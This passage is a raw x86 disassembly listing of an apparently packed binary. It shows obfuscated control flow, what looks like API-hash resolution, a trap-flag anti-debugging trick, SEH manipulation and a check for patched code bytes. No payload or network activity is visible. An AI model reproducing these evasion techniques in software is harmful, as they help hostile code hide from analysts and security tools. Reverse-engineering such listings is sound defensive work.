; START OF FUNCTION CHUNK FOR sub_42B15E
loc_423D6A: ; CODE XREF: sub_42B15E:loc_423544�j
dec dword ptr [ebp-18h]
jnz loc_425C11
jmp loc_42D884
; END OF FUNCTION CHUNK FOR sub_42B15E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427967
loc_423D78: ; CODE XREF: sub_427967+7�j
call sub_427EAF
; END OF FUNCTION CHUNK FOR sub_427967
; START OF FUNCTION CHUNK FOR sub_4253F4
loc_423D7D: ; CODE XREF: sub_4253F4+81C0�j
jmp loc_4295A5
; END OF FUNCTION CHUNK FOR sub_4253F4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A260
loc_423D82: ; CODE XREF: sub_42A260+E�j
jmp loc_426D0C
; END OF FUNCTION CHUNK FOR sub_42A260
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425499
loc_423D87: ; CODE XREF: sub_425499+54A�j
push eax
push offset loc_42E038
jmp nullsub_160
; END OF FUNCTION CHUNK FOR sub_425499
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42461C
loc_423D92: ; CODE XREF: _0182ofla:loc_427C97�j
; sub_42461C+36EF�j
push 947D0E15h
jmp loc_4251C4
; END OF FUNCTION CHUNK FOR sub_42461C
; ---------------------------------------------------------------------------
loc_423D9C: ; CODE XREF: _0182ofla:0042E254�j
sbb esi, ebp
; =============== S U B R O U T I N E =======================================
sub_423D9E proc near ; CODE XREF: sub_4269FA+A�p
mov [esp+0], edx
pop edx
loc_423DA2: ; CODE XREF: _0182ofla:00429A0A�j
push eax
push eax
jmp loc_42645E
sub_423D9E endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427445
loc_423DA9: ; CODE XREF: sub_427445+15�j
push ecx
push 4074DE75h
pop ecx
or ecx, 23B483C8h
xor ecx, 63F4DFFFh
add eax, ecx
pop ecx
mov eax, [eax]
jmp loc_429FC3
; END OF FUNCTION CHUNK FOR sub_427445
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C906
loc_423DC6: ; CODE XREF: sub_42C906+19�j
jnz loc_427E6D
jmp loc_42B3A3
; END OF FUNCTION CHUNK FOR sub_42C906
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253F4
loc_423DD1: ; CODE XREF: sub_4253F4:loc_425886�j
jnz loc_42B6AA
jmp loc_42C6C7
; END OF FUNCTION CHUNK FOR sub_4253F4
; ---------------------------------------------------------------------------
locret_423DDC: ; CODE XREF: _0182ofla:00425371�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B15E
loc_423DDD: ; CODE XREF: sub_42B15E-70FE�j
; sub_423AB1+53E9�j
pop large dword ptr fs:0
pop edx
pop ecx
pop ebx
jmp loc_424837
; END OF FUNCTION CHUNK FOR sub_42B15E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D056
loc_423DEC: ; CODE XREF: sub_42D056:loc_42858C�j
xchg eax, [esp+4+var_4]
or eax, 100h
xchg eax, [esp+4+var_4]
popf
nop
jmp loc_42E636
; END OF FUNCTION CHUNK FOR sub_42D056
; ---------------------------------------------------------------------------
loc_423DFF: ; DATA XREF: sub_423F50+9637�o
lea eax, [ebp-125h]
push eax
call sub_42DBF0
call sub_42EDCF
; START OF FUNCTION CHUNK FOR sub_428EB9
loc_423E10: ; CODE XREF: sub_428EB9-4DCF�j
jmp loc_427C17
; END OF FUNCTION CHUNK FOR sub_428EB9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426851
loc_423E15: ; CODE XREF: sub_426851+F�j
push esi
push 0E8FAA161h
pop esi
add esi, 17055E9Fh
jmp loc_429821
; END OF FUNCTION CHUNK FOR sub_426851
; ---------------------------------------------------------------------------
add ebx, 7AE4CB68h
jmp loc_4272E2
; ---------------------------------------------------------------------------
loc_423E32: ; DATA XREF: sub_423A2A+10F1�o
call sub_42B097
mov ds:dword_427A24, eax
; START OF FUNCTION CHUNK FOR sub_423A2A
loc_423E3C: ; CODE XREF: sub_428F20:loc_424F21�j
; sub_423A2A:loc_42965F�j ...
mov esp, ebp
pop ebp
push ds:dword_427A24
jmp nullsub_119
; END OF FUNCTION CHUNK FOR sub_423A2A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FE2
loc_423E4A: ; CODE XREF: sub_423FE2+14�j
jz loc_427746
jmp loc_425F9D
; END OF FUNCTION CHUNK FOR sub_423FE2
; ---------------------------------------------------------------------------
loc_423E55: ; CODE XREF: _0182ofla:00427373�j
pushf
sbb ebx, edi
sbb ebp, 822D3836h
loc_423E5E: ; CODE XREF: _0182ofla:loc_42821C�j
call nullsub_201
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42448C
loc_423E64: ; CODE XREF: sub_42448C+3EA5�j
jmp loc_42626A
; END OF FUNCTION CHUNK FOR sub_42448C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B1F9
loc_423E69: ; CODE XREF: sub_42B1F9:loc_42B26F�j
call sub_423FCD
test al, al
jmp loc_4270D4
; END OF FUNCTION CHUNK FOR sub_42B1F9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_148. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_423E76: ; CODE XREF: _0182ofla:004268C0�j
mov edi, 5ABA1547h
cdq
sub esi, 48772F41h
; START OF FUNCTION CHUNK FOR sub_4298DD
loc_423E82: ; CODE XREF: sub_4298DD:loc_4268B3�j
or eax, 0E7D3569Bh
add eax, 66E1D9h
jmp loc_42E368
; END OF FUNCTION CHUNK FOR sub_4298DD
; ---------------------------------------------------------------------------
add eax, edx
sbb edi, esi
jmp sub_42EB7D
; ---------------------------------------------------------------------------
loc_423E9C: ; DATA XREF: _0182ofla:004235BD�o
xor eax, eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AB9B
loc_423E9F: ; CODE XREF: sub_42AB9B-6560�j
jmp nullsub_73
; END OF FUNCTION CHUNK FOR sub_42AB9B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D15D
loc_423EA4: ; CODE XREF: sub_42D15D�j
call sub_427445
push ecx
mov ecx, [esp+4+arg_8]
jmp loc_428A1F
; END OF FUNCTION CHUNK FOR sub_42D15D
; =============== S U B R O U T I N E =======================================
sub_423EB3 proc near ; CODE XREF: _0182ofla:00424FEB�p
; _0182ofla:00426D1F�j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0042B727 SIZE 00000012 BYTES
mov [esp+0], edi
pop edi
call sub_424CD8
loc_423EBC: ; CODE XREF: _0182ofla:loc_429422�j
mov esp, ebp
xchg ecx, [esp-4+arg_0]
mov ebp, ecx
pop ecx
loc_423EC4: ; CODE XREF: sub_428110:loc_42DCAC�j
push esi
jmp loc_42B727
sub_423EB3 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425629
loc_423ECA: ; CODE XREF: sub_425629-20FB�j
jnp loc_42A51A
jb loc_42AD62
sub ecx, edi
xor ebp, 1C40ED10h
loc_423EDE: ; CODE XREF: sub_425629-2103�j
add edx, 0F5E1E23Fh
jmp loc_42E4CC
; END OF FUNCTION CHUNK FOR sub_425629
; ---------------------------------------------------------------------------
mov edx, 92B16BD7h
call sub_42D71D
call sub_428D17
mov edx, 9E849D81h
call sub_42D71D
call sub_428D17
mov edx, 0F7C6D0F8h
jmp loc_4262A3
; ---------------------------------------------------------------------------
shl eax, 9
jmp loc_42D8FD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424BCB
loc_423F19: ; CODE XREF: sub_424BCB:loc_428793�j
push eax
call sub_42E218
mov eax, [ebp-0Ch]
cmp eax, ds:dword_42578C
jmp loc_42AA18
; END OF FUNCTION CHUNK FOR sub_424BCB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_423F2D: ; CODE XREF: sub_42798F-1923�j
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42662C
loc_423F31: ; CODE XREF: sub_42583B+C�j
; sub_42662C+FD7�j
mov byte ptr [ebp-5], 0
loc_423F35: ; CODE XREF: _0182ofla:00423257�j
jmp loc_427A2D
; END OF FUNCTION CHUNK FOR sub_42662C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_28. PRESS KEYPAD "+" TO EXPAND]
db 0FEh
dd 0F7000096h, 9EB332C2h, 0F6F7E9BDh
db 2 dup(0FFh)
; ---------------------------------------------------------------------------
loc_423F4A: ; CODE XREF: _0182ofla:004241D4�j
; _0182ofla:00428902�j
and edi, 141BBE14h
; =============== S U B R O U T I N E =======================================
sub_423F50 proc near ; CODE XREF: sub_425AB1:loc_42A032�p
; FUNCTION CHUNK AT 00423D49 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00424447 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00425921 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042654E SIZE 00000003 BYTES
; FUNCTION CHUNK AT 00426EBD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429F4E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042D581 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042DD64 SIZE 00000018 BYTES
mov [esp+0], edi
pop edi
mov byte ptr [eax], 6Ch
inc dword ptr [ebp-20h]
mov eax, [ebp-20h]
loc_423F5D: ; CODE XREF: sub_42E9A5:loc_427FDA�j
mov byte ptr [eax], 0
jmp loc_425921
sub_423F50 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_423F65 proc near ; CODE XREF: _0182ofla:0042509B�p
; _0182ofla:0042CD22�j
mov [esp+0], eax
pop eax
xchg eax, edi
push edi
xchg eax, edi
jmp loc_42831F
sub_423F65 endp
; =============== S U B R O U T I N E =======================================
sub_423F73 proc near ; CODE XREF: sub_425879+3�p
; FUNCTION CHUNK AT 004242A0 SIZE 00000005 BYTES
xchg ecx, [esp+0]
mov ecx, [esp+0]
push offset loc_42DF31
loc_423F7E: ; CODE XREF: sub_42B1F9:loc_42A2BE�j
jmp loc_4242A0
sub_423F73 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4295D6
loc_423F83: ; CODE XREF: sub_4295D6-45FC�j
call sub_428D09
mov edx, 9E99B23Eh
call sub_42D71D
push eax
ror eax, 13h
jmp loc_42A3BD
; END OF FUNCTION CHUNK FOR sub_4295D6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D6DD
loc_423F9B: ; CODE XREF: sub_42D6DD:loc_425798�j
push offset loc_426E32
jmp loc_424D8A
; END OF FUNCTION CHUNK FOR sub_42D6DD
; ---------------------------------------------------------------------------
jge locret_42D702
jmp sub_427C4D
; ---------------------------------------------------------------------------
xor edi, 0F47713EAh
pop edx
jmp sub_42E1F0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427259
loc_423FBC: ; CODE XREF: sub_427259:loc_42C3A9�j
jz loc_428AAB
jmp loc_426872
; END OF FUNCTION CHUNK FOR sub_427259
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_41. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AAF8
loc_423FC8: ; CODE XREF: sub_42AAF8+3AE1�j
jmp loc_42C858
; END OF FUNCTION CHUNK FOR sub_42AAF8
; =============== S U B R O U T I N E =======================================
sub_423FCD proc near ; CODE XREF: sub_423A2A:loc_423045�p
; sub_423114�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00423198 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004237AC SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00423850 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042404D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00426519 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00427011 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042763A SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004286A3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004289EB SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00428E1A SIZE 00000004 BYTES
; FUNCTION CHUNK AT 0042A0A7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042A3D5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A8A2 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0042ACF6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B389 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B485 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C2AE SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042C53C SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042C63B SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0042C763 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042C895 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042CFDA SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042D42A SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042DA12 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0042DC90 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0042E61A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042E740 SIZE 00000013 BYTES
js loc_42E740
call sub_4271AD
loc_423FD8: ; CODE XREF: sub_423FE2+5D08�j
jmp loc_423850
sub_423FCD endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A915
loc_423FDD: ; CODE XREF: sub_42A915-6F83�j
jmp nullsub_116
; END OF FUNCTION CHUNK FOR sub_42A915
; =============== S U B R O U T I N E =======================================
sub_423FE2 proc near ; CODE XREF: _0182ofla:00426BF6�j
; sub_42E6BF+6�p
; FUNCTION CHUNK AT 0042358D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423E4A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00425F9D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427746 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428C63 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428E3A SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00429556 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004298C6 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00429CE4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042A670 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042DD4D SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042DE16 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E09E SIZE 0000000C BYTES
mov [esp+0], edx
pop edx
and eax, 0FFFFFFh
loc_423FEB: ; CODE XREF: _0182ofla:loc_4247A1�j
cmp eax, 0C3C033h
jnz loc_428E3A
jmp loc_423E4A
sub_423FE2 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_423FFB proc near ; DATA XREF: sub_42B097+1A28�o
; FUNCTION CHUNK AT 004260FB SIZE 00000005 BYTES
add esp, 0FFFFFFE4h
mov [ebp-8], edx
mov [ebp-4], eax
call sub_4277D0
loc_424009: ; CODE XREF: sub_42660C+A�j
; sub_426B83:loc_426B8B�j ...
push offset loc_426C70
jmp loc_4260FB
sub_423FFB endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428041
loc_424013: ; CODE XREF: sub_428041+100A�j
push 0
push 10h
mov eax, [ebp+8]
push eax
call sub_4295D6
call sub_42A760
loc_424025: ; CODE XREF: sub_428D63+21DD�j
jmp loc_42B063
; END OF FUNCTION CHUNK FOR sub_428041
; ---------------------------------------------------------------------------
loc_42402A: ; CODE XREF: _0182ofla:00429445�j
jnz loc_42E309
or ecx, edx
jmp sub_428B26
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C415
loc_424037: ; CODE XREF: sub_42C415:loc_425551�j
; sub_42C415-6351�j
push offset sub_423249
jmp nullsub_217
; END OF FUNCTION CHUNK FOR sub_42C415
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_168. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D056
loc_424042: ; CODE XREF: sub_42D056+FEF�j
jmp loc_424DCD
; END OF FUNCTION CHUNK FOR sub_42D056
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_31. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B1F9
loc_424048: ; CODE XREF: sub_42B1F9+3359�j
jmp sub_423FCD
; END OF FUNCTION CHUNK FOR sub_42B1F9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_42404D: ; CODE XREF: sub_423FCD+2557�j
not eax
mov [edi], esi
test esi, edx
jmp loc_42D42A
; END OF FUNCTION CHUNK FOR sub_423FCD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4231F3
loc_424058: ; CODE XREF: sub_4231F3+3748�j
jnz loc_428E98
; END OF FUNCTION CHUNK FOR sub_4231F3
; START OF FUNCTION CHUNK FOR sub_42B15E
loc_42405E: ; CODE XREF: _0182ofla:loc_426D60�j
; sub_42B15E:loc_42B6DB�j
mov eax, ebx
jmp loc_423DDD
; END OF FUNCTION CHUNK FOR sub_42B15E
; =============== S U B R O U T I N E =======================================
sub_424065 proc near ; CODE XREF: sub_4231F3�p sub_423AB1+4�p ...
mov eax, [ebx+ecx]
xor eax, [ebx+ecx+4]
cmp eax, 7C61090Eh
retn
sub_424065 endp
; =============== S U B R O U T I N E =======================================
sub_424072 proc near ; CODE XREF: sub_42C6EB+11�p
; sub_4268FC:loc_42D50B�p
; FUNCTION CHUNK AT 0042679E SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00426BBB SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00427CB3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042EA3B SIZE 00000007 BYTES
xor bx, bx
add ebx, 10000h
jmp loc_42679E
sub_424072 endp
; =============== S U B R O U T I N E =======================================
sub_424080 proc near ; CODE XREF: _0182ofla:0042B81F�p
xchg edi, [esp+0]
pop edi
mov eax, [eax]
add eax, [ebp-4]
call sub_4289E4
cmp eax, [ebp-8]
jmp loc_426D88
sub_424080 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427AB9
loc_424096: ; CODE XREF: sub_427AB9+17�j
sub ecx, 48140143h
add ecx, 1066EC7Eh
popf
; END OF FUNCTION CHUNK FOR sub_427AB9
; START OF FUNCTION CHUNK FOR sub_42798F
loc_4240A3: ; CODE XREF: sub_42798F+6CEF�j
xchg ecx, [esp+4+var_4]
loc_4240A6: ; CODE XREF: _0182ofla:00428487�j
jmp sub_42D71D
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
loc_4240AB: ; CODE XREF: _0182ofla:0042DD0B�j
jge loc_42AA45
loc_4240B1: ; CODE XREF: _0182ofla:0042DCF0�j
add edx, 277E2B15h
add edx, ebp
add edx, 0D06129E2h
mov al, [edx]
push offset sub_42A3DA
; START OF FUNCTION CHUNK FOR sub_425629
loc_4240C6: ; CODE XREF: sub_425629+6F7B�j
jmp nullsub_100
; END OF FUNCTION CHUNK FOR sub_425629
; ---------------------------------------------------------------------------
locret_4240CB: ; CODE XREF: _0182ofla:loc_429D45�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425629
loc_4240CC: ; CODE XREF: sub_425629+10�j
adc ebp, ecx
jmp loc_424CA8
; END OF FUNCTION CHUNK FOR sub_425629
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428EB9
loc_4240D3: ; CODE XREF: sub_428EB9:loc_42BCFD�j
mov eax, [ebp+8]
push eax
cmp dword ptr [ebp-14h], 5
setz al
call sub_42ECAD
loc_4240E3: ; CODE XREF: sub_42537E:loc_4272BE�j
pop ecx
shl eax, 3
mov edx, [ebp+8]
jmp loc_423E10
; END OF FUNCTION CHUNK FOR sub_428EB9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_4240EF: ; CODE XREF: sub_42798F:loc_42665D�j
push offset sub_42E178
jmp nullsub_223
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
loc_4240F9: ; CODE XREF: _0182ofla:004263A8�j
rol esi, 8
; =============== S U B R O U T I N E =======================================
sub_4240FC proc near ; CODE XREF: sub_4231D5:loc_429E09�p
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 00423A30 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042610F SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004289D3 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042D1F8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042ECA8 SIZE 00000005 BYTES
xchg ecx, [esp-8+arg_4]
pop ecx
adc edx, [esp+4]
jmp loc_42ECA8
sub_4240FC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_424109: ; CODE XREF: _0182ofla:loc_42B424�j
lea eax, [ebp-400h]
push eax
call sub_42D730
test eax, eax
jz loc_428547
jmp loc_429C26
; ---------------------------------------------------------------------------
loc_424122: ; DATA XREF: sub_42D387+15C8�o
test byte ptr [eax-8], 10h
jz loc_42A460
inc dword ptr [ebp-8]
loc_42412F: ; CODE XREF: _0182ofla:loc_4254C9�j
; _0182ofla:0042CA43�j
mov eax, [ebp-8]
pop ecx
pop ecx
pop ebp
jmp locret_42A45A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42561D
loc_42413A: ; CODE XREF: sub_42561D+7�j
add [ebp-8], eax
mov eax, [ebp-8]
shl eax, 0Ah
add [ebp-8], eax
mov eax, [ebp-8]
shr eax, 6
jmp loc_42B592
; END OF FUNCTION CHUNK FOR sub_42561D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_172. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B1F9
loc_424152: ; CODE XREF: sub_42B1F9-5DB4�j
jmp loc_42B26F
; END OF FUNCTION CHUNK FOR sub_42B1F9
; =============== S U B R O U T I N E =======================================
sub_424157 proc near ; DATA XREF: sub_428599:loc_427F8E�o
lea edx, [eax+20h]
call sub_429A98
sub_424157 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_428BBF
loc_42415F: ; CODE XREF: sub_428BBF+2C72�j
jmp loc_42849F
; END OF FUNCTION CHUNK FOR sub_428BBF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F46
loc_424164: ; CODE XREF: sub_428F46-3811�j
jmp loc_4261B0
; END OF FUNCTION CHUNK FOR sub_428F46
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429E52
loc_424169: ; CODE XREF: sub_429E52-62B3�j
jmp loc_429F79
; END OF FUNCTION CHUNK FOR sub_429E52
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D888
loc_42416E: ; CODE XREF: sub_42D888:loc_4257F3�j
push eax
call sub_427F03
call sub_42417A
retn
; END OF FUNCTION CHUNK FOR sub_42D888
; =============== S U B R O U T I N E =======================================
sub_42417A proc near ; CODE XREF: sub_42D888-9714�p
; FUNCTION CHUNK AT 0042C279 SIZE 00000005 BYTES
push offset sub_42A642
jmp loc_42C279
sub_42417A endp
; =============== S U B R O U T I N E =======================================
sub_424184 proc near ; CODE XREF: sub_429F6C+D49�p
; _0182ofla:0042E75B�j
; FUNCTION CHUNK AT 0042302B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042328D SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00424CF7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042559A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00426286 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042691F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00426A45 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004293C8 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00429908 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042A543 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B7D3 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042B8E4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042CB76 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042CF3A SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0042D2A4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E3CB SIZE 00000017 BYTES
xchg eax, [esp+0]
pop eax
mov [edx], eax
call sub_427C9D
loc_42418F: ; CODE XREF: sub_42894D+11�j
jnz loc_423293
loc_424195: ; CODE XREF: _0182ofla:004292BE�j
jmp loc_42302B
sub_424184 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42419A proc near ; DATA XREF: sub_42448C+1E47�o
pop ecx
pop ebp
retn
sub_42419A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42448C
loc_42419D: ; CODE XREF: sub_42448C+1E40�j
mov eax, [ebp+var_4]
call sub_426571
loc_4241A5: ; CODE XREF: sub_42C553-760B�j
mov edx, esi
loc_4241A7: ; CODE XREF: sub_42C553:loc_42487B�j
push 0AE978795h
pop eax
and eax, 0C464DB8Fh
push offset sub_426649
jmp loc_429BE7
; END OF FUNCTION CHUNK FOR sub_42448C
; ---------------------------------------------------------------------------
or edi, ebp
sub edi, eax
jmp sub_42976D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AAF8
loc_4241C6: ; CODE XREF: sub_42AAF8+16�j
jz loc_424549
jmp loc_42AE5F
; END OF FUNCTION CHUNK FOR sub_42AAF8
; ---------------------------------------------------------------------------
ror edi, 15h
jmp loc_423F4A
; ---------------------------------------------------------------------------
push esi
push 8C4254A7h
pop esi
and esi, 5BC32DB4h
add esi, 0F8005300h
jmp loc_42ACBA
; ---------------------------------------------------------------------------
cmp edi, edx
jmp loc_425D89
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42662C
loc_4241F8: ; CODE XREF: sub_42662C:loc_42CD04�j
call sub_42E6BF
loc_4241FD: ; CODE XREF: sub_42CCE0-6AF3�j
jmp loc_426667
; END OF FUNCTION CHUNK FOR sub_42662C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A420
loc_424202: ; CODE XREF: sub_42A420:loc_427215�j
jnz loc_428085
jmp loc_42E058
; END OF FUNCTION CHUNK FOR sub_42A420
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D63
loc_42420D: ; CODE XREF: sub_428D63-2832�j
jns loc_42726A
jmp loc_428B5E
; END OF FUNCTION CHUNK FOR sub_428D63
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C553
loc_424218: ; CODE XREF: sub_42C553:loc_42CC44�j
cmp dword ptr [ebp-4], 0
jnz loc_428B5E
push 5C2499B3h
pop eax
and eax, ds:4000F5h
cmp eax, 0D752640Fh
jmp loc_42944A
; END OF FUNCTION CHUNK FOR sub_42C553
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429242
loc_424239: ; CODE XREF: sub_429242:loc_42B159�j
mov ebx, esi
ror ecx, 0Fh
and ebp, 17ED2AB5h
jmp loc_4266A1
; END OF FUNCTION CHUNK FOR sub_429242
; ---------------------------------------------------------------------------
loc_424249: ; CODE XREF: _0182ofla:loc_42AD9D�j
jnz loc_42E1BC
jmp loc_4257C9
; =============== S U B R O U T I N E =======================================
sub_424254 proc near ; DATA XREF: sub_42C718:loc_42770A�o
var_4 = dword ptr -4
push ebx
push 0B99ED79Fh
pop ebx
add ebx, 75C58Fh
or ebx, 205F4B51h
add ebx, 45E2E42Fh
xchg ebx, [esp+4+var_4]
jmp sub_423FCD
sub_424254 endp
; ---------------------------------------------------------------------------
mov ecx, eax
or ebx, eax
jmp sub_428A5F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A2A
loc_42427E: ; CODE XREF: sub_423A2A+370B�j
jnz loc_4269B2
jmp loc_42A563
; END OF FUNCTION CHUNK FOR sub_423A2A
; =============== S U B R O U T I N E =======================================
sub_424289 proc near ; CODE XREF: _0182ofla:00426ECF�j
; sub_4277D0+6�p
; FUNCTION CHUNK AT 00423955 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00426260 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004289D1 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 00428A49 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428E23 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A716 SIZE 00000013 BYTES
xchg ecx, [esp+0]
pop ecx
mov [ebp-0Ch], eax
cmp dword ptr [ebp-4], 0
jz loc_426260
jmp loc_428E23
sub_424289 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_139. PRESS KEYPAD "+" TO EXPAND]
